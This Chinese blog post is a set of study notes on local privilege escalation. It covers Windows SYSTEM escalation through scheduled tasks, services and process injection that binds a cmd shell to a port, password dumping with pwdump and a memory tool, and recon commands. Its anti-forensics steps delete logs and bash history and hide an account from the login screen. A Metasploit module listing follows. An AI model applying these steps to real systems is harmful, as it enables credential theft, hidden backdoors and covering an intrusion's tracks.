BetaMao

本地提权

字数统计: 2.9k阅读时长: 12 min
2016/05/02 Share

记录一些Windows下的本地提权方法~

通过软件,服务漏洞取得shell的权限是那个软件,服务的权限,或是执行那个软件,服务的账号所拥有的权限,出于安全性考虑这些权限可能会很低,就需要提权,还有一个知识点就是一般以什么账号运行的软件会有账号的权限,通过软件生成的进程也是具有和软件同样的权限。
首先,说下Windows下的两个特殊账号:system和administrator,哪个权限高?系统还是最高管理员?
其实他们是针对不同的对象的,所以他们各有特别的权限,例如SAM,部分注册表等必须要系统权限才能读取!又有些只有administrator才能使用,所以他们的交集才算是系统的最高权限吧。

Administrator->system

这里是本文需要用到的三个工具,为了方便可以直接放到环境变量下。【本文全都是放在windows\system32目录下的】
whami可以查看自己目前的用户,权限
1:在WindowsXP里从administrator到system权限
首先看下自己的权限,是administrator

查看当前系统时间,然后用at命令建一个计划,在什么时间启动它,这里看到系统时间是17:10分
就建个任务在17:11分执行,后面的interactive就是交互式执行,你能看到他,后面的cmd都不陌生就是一条命令,打开cmd软件,可以改成其他的有效命令

到时间时看到已经弹出来一个新窗口,是system权限的

一般这就够了,可以在这里面执行很多命令,也可以以此权限运行桌面环境,会得到一个system账号的桌面环境,在那里面的所有操作也是system权限哦【操作如图,先结束掉administrator的桌面再创建桌面】


2:在高版本系统,at命令已经没有了,可以用下面的命令
这条命令的意思是创建一个叫做syscmd的服务,这条服务是来启动一个cmd的

1
2
sc Create syscmd binPath= "cmd /K start" type= own type= interact 
sc start syscmd




看到已经成功了!
3:使用微软的套件完成
输入如图的命令

4:通过注入进程的方式切换到其他进程
使用如下命令查看当前有哪些进程,他的pid和权限,用户。。

因为没有低权限的,就随便找了一个system的进程,pid为848,运行cmd,绑定到12345这个端口,然后就可以使用nc来连接了

如图,这是在另一台电脑上通过nc连到的,查看权限是system(怎么用nc?请查看本站关于他的使用文章)

进程注入可以注入到任意的进程中去就是拥有任意权限,而且因为没有新进程,还是不容易被发现的,不过他会开一个端口,通过检查端口就会发现问题,这也给我们提醒了,检查后门可以通过查看端口来,不过也不要只看他,有的比较猥琐的会在特定的时间开启端口。。。

Administrator->passwd

背景:
Windows的密码系统密码以加密的方式保存在/windows/system32/config/下的sam文件里,而账号在登陆后会将密码的密文和明文的都保存在于内存当中,正常情况下系统启动后sam是不能读取的,但是也可以使用软件,现在来介绍一个小工具pwdump,它支持远程获取目标数据库的密码,需要知道至少一个账号

1
pwdump -u username -p passwd hostname|ip

对于登陆后的本机当然就不需要账号和密码了

1
pwdump localhost


这个文件对应每个账号分成4部分,username:uid:LM:NTLM后面两个就是以两种不同的方式加密的密码,前一种存在缺陷会将使密码不区分大小写且7个字符一段最多14个字符,现在已经没怎么用了,不过为了兼容以前的还是存在。得到这个就可以用ophcrack跑了,速度很快的(怎么用?看本站的关于它的笔记吧、、、)
然后还有工具可以直接读取内存中的明文密码!简单省事

默认使用-l 读取数据格式username:domain:lm:ntlm(这种读取是从内存中读取已经登陆的信息,而不是读取sam数据库)这样默认是先用安全的方式读取,若读取失败再用不安全的方式,那样很可能会对系统造成破坏,可以使用-f 参数强制使用安全的方式

1
2
3
4
-g参数是用来计算密码得,就是制定一个明文会使用系统的加密方式来计算密文
-c 以指定会话来执行cmd
-v 显示详细信息,这样才能看到luid信息
-w 这才是最关键的,用来查看已登录的明文密码


下面再来介绍一款神器,超级强大,这里只介绍一个功能,其他的操作可自行百度

进入软件,此软件可用::查看帮助,选定一个模块后也可以使用::查看本模块的帮助,例如

这样查看有哪些模块,选定privilege加::可以看到它之下的命令

看到它有两个子命令可以使用

这里使用了debug提权,然后就可以去读取密码了,输入如图。。。

这个工具超级超级超级强大,可以去看手册了解。。。

利用其它信息

再谈谈其他比较常见的东西,内容简单又较多,就不截图了,需要自己输入去看看效果才能很好地理解!

Linux 基本信息收集

1
2
3
4
5
6
7
8
/etc/resolv.conf 看DNS配置,看可不可以劫持,例如直接该文件呀
/etc/passwd 存放账号信息
/etc/shadow 存放密码信息
whoami and who –a 查看用户信息
ifconfig -a, iptables -L -n, ifconfig –a, netstat –r 查看网络参数信息
uname –a 查看系统版本信息,看有木有已知的漏洞
ps aux 查看当前进程信息
dpkg -l| head 查看软件包安装信息

Windows 基本信息收集

1
2
3
4
5
6
7
8
9
10
11
12
ipconfig /all 	基本的网络配置
ipconfig /displaydns 显示缓存的dns解析记录
netstat -bnao 查看各个软件的连接信息
netstat –r 显示网络接口,路由表等
net view , net view /domain 查看网络共享的
net user /domain, net user %username% /domain 查看与共享的
net accounts 显示账户安全策略的
net share 显示文件共享的
net localgroup administrators username /add 将一个账户加到管理员组
net group "Domain Controllers" /domain 查看域控制的
net share name$=C:\ /unlimited 将C盘无限制的共享
net user username /active:yes /domain 激活某个用户

WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)

1
2
3
4
5
6
7
8
9
10
wmic computersystem get username 查看当前登录账号名称的
wmic netlogin get name,lastlogon 查看用户登录记录的
wmic process get caption, executablepath,commandline 看到当前进程及是由那条命令(软件及文件位置)生成的进程
wmic process where name=“calc.exe" call terminate 结束这个叫calc.exe的进程
wmic os get name,servicepackmajorversion 取得系统版本的,补丁
wmic product get name,version 查看当前安装的软件
wmic product where name=“name” call uninstall /nointeractive 在后台静默的删除“”里面名字的软件
wmic share get /ALL 看共享的
wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1" 用来开启远程桌面的,机器名就是目标机器的名称,自己就可以改为localhost
wmic nteventlog get path,filename, writeable 查看系统日志及存放位置的

收集敏感数据

1
2
3
4
5
系统信息 
.ssh ;.gnupg 这个目录下有公私钥,用cat known_hosts查看,密钥可以登录系统
/tmp 临时目录权限高,里面容易残留敏感信息
SAM 数据库 ; 注册表文件
UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\ 这是windows的临时目录

隐藏痕迹

禁止在登陆界面显示uname这个账号,都知道Windows在都有多个账号开机时会提示登入哪个账户,这样可以不提示:

1
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0

1
2
3
4
5
6
7
8
9
del %WINDIR%\*.log /a/s/q/f 			删除日志记录
History -c Linux下的删除历史命令的命令
rm -f .bash_history
touch .bash_history
chattr +i .bash_history Linux的历史命令还会写入文件,可以用这种方式让它不记录历史命令,注意这些都是在家目录下执行的
lssttr 文件 查看特殊权限
/var/log/auth.log|secure 用户认证信息文件,可以用cat打开
btmp / wtmp 记录登录信息的文件,需用last打开
lastlog | faillog 查看最后登录信息|登录失败信息

利用metasploit

metasploit下有很多本地提权的模块:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
root@kali:~# msfconsole 

_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\


=[ metasploit v4.15.5-dev ]
+ -- --=[ 1674 exploits - 959 auxiliary - 294 post ]
+ -- --=[ 489 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search Escalate

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
auxiliary/admin/mssql/mssql_escalate_dbowner normal Microsoft SQL Server Escalate Db_Owner
auxiliary/admin/mssql/mssql_escalate_dbowner_sqli normal Microsoft SQL Server SQLi Escalate Db_Owner
auxiliary/admin/mssql/mssql_escalate_execute_as normal Microsoft SQL Server Escalate EXECUTE AS
auxiliary/admin/mssql/mssql_escalate_execute_as_sqli normal Microsoft SQL Server SQLi Escalate Execute AS
auxiliary/scanner/http/cisco_ssl_vpn_priv_esc 2014-04-09 normal Cisco ASA SSL VPN Privilege Escalation Vulnerability
auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription 2005-04-18 normal Oracle DB SQL Injection via SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION
auxiliary/sqli/oracle/dbms_export_extension 2006-04-26 normal Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION
auxiliary/sqli/oracle/dbms_metadata_get_granted_xml 2008-01-05 normal Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML
auxiliary/sqli/oracle/dbms_metadata_get_xml 2008-01-05 normal Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML
auxiliary/sqli/oracle/dbms_metadata_open 2008-01-05 normal Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN
auxiliary/sqli/oracle/droptable_trigger 2009-01-13 normal Oracle DB SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger
auxiliary/sqli/oracle/lt_findricset_cursor 2007-10-17 normal Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method
exploit/linux/http/pandora_fms_exec 2014-01-29 excellent Pandora FMS Remote Code Execution
exploit/linux/http/riverbed_netprofiler_netexpress_exec 2016-06-27 excellent Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution
exploit/linux/local/bpf_priv_esc 2016-05-04 good Linux BPF Local Privilege Escalation
exploit/linux/local/desktop_privilege_escalation 2014-08-07 excellent Desktop Linux Password Stealer and Privilege Escalation
exploit/linux/local/sophos_wpa_clear_keys 2013-09-06 excellent Sophos Web Protection Appliance clear_keys.pl Local Privilege Escalation
exploit/linux/local/zpanel_zsudo 2013-06-07 excellent ZPanel zsudo Local Privilege Escalation Exploit
exploit/multi/http/moodle_cmd_exec 2013-10-30 good Moodle Remote Command Execution
exploit/osx/local/nfs_mount_root 2014-04-11 normal Mac OS X NFS Mount Privilege Escalation Exploit
exploit/osx/local/rootpipe 2015-04-09 great Apple OS X Rootpipe Privilege Escalation
exploit/osx/local/tpwn 2015-08-16 normal Mac OS X "tpwn" Privilege Escalation
exploit/windows/local/ask 2012-01-03 excellent Windows Escalate UAC Execute RunAs
exploit/windows/local/bypassuac 2010-12-31 excellent Windows Escalate UAC Protection Bypass
exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
exploit/windows/local/bypassuac_injection 2010-12-31 excellent Windows Escalate UAC Protection Bypass (In Memory Injection)
exploit/windows/local/bypassuac_vbs 2015-08-22 excellent Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
exploit/windows/local/ms10_092_schelevator 2010-09-13 excellent Windows Escalate Task Scheduler XML Privilege Escalation
exploit/windows/local/service_permissions 2012-10-15 great Windows Escalate Service Permissions Local Privilege Escalation
exploit/windows/local/trusted_service_path 2001-10-25 excellent Windows Service Trusted Path Privilege Escalation
payload/cmd/mainframe/apf_privesc_jcl normal JCL to Escalate Privileges
post/multi/escalate/aws_create_iam_user normal Create an AWS IAM User
post/multi/escalate/cups_root_file_read 2012-11-20 normal CUPS 1.6.1 Root File Read
post/multi/escalate/metasploit_pcaplog 2012-07-16 manual Multi Escalate Metasploit pcap_log Local Privilege Escalation
post/windows/escalate/droplnk normal Windows Escalate SMB Icon LNK Dropper
post/windows/escalate/getsystem normal Windows Escalate Get System via Administrator
post/windows/escalate/golden_ticket normal Windows Escalate Golden Ticket
post/windows/escalate/ms10_073_kbdlayout 2010-10-12 normal Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation
post/windows/escalate/screen_unlock normal Windows Escalate Locked Desktop Unlocker


msf >

利用内核漏洞

不多说,例如:
https://github.com/SecWiki/windows-kernel-exploits
这里收集了很多本地提权漏洞可以直接运行提权。

参考

安全牛课堂-kali-linux
CATALOG
  1. 1.
  2. 2. Administrator->system
  3. 3. Administrator->passwd
  4. 4. 利用其它信息
    1. 4.1. Linux 基本信息收集
    2. 4.2. Windows 基本信息收集
    3. 4.3. 收集敏感数据
    4. 4.4. 隐藏痕迹
  5. 5. 利用metasploit
  6. 6. 利用内核漏洞
  7. 7. 参考